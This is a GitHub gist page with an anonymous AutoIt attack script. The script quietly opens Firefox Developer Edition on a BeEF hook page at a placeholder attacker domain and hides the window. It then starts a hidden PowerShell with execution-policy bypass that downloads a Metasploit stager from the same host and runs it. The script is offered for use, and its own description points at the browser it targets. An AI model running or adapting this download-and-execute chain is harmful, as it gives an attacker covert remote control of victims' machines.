Skip to content

Instantly share code, notes, and snippets.

/gist:09f10cdb5d9b0bae4755850273083fd2 Secret

Created May 10, 2017 13:10
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save anonymous/09f10cdb5d9b0bae4755850273083fd2 to your computer and use it in GitHub Desktop.
Save anonymous/09f10cdb5d9b0bae4755850273083fd2 to your computer and use it in GitHub Desktop.
Download ZIP
AutoIt script: Targets Firefox Developer Edition. Change the $path and WinWait title accordingly....
Raw
gistfile1.txt
$path = "C:\Program Files (x86)\Firefox Developer Edition\"
$path1 = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\"
ShellExecute($path & "firefox.exe", "https://attacker.domain/beef.html", "", "", @SW_HIDE)
WinWait("[TITLE:Firefox Developer Edition]")
WinSetState ("[LAST]", "", @SW_HIDE)
ShellExecute($path1 & "powershell.exe", "-ep Bypass -W Hidden -c """"(new-object Net.WebClient).DownloadString('https://attacker.domain/metasploit_stager.ps1') | iex""""", "", "", @SW_HIDE)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment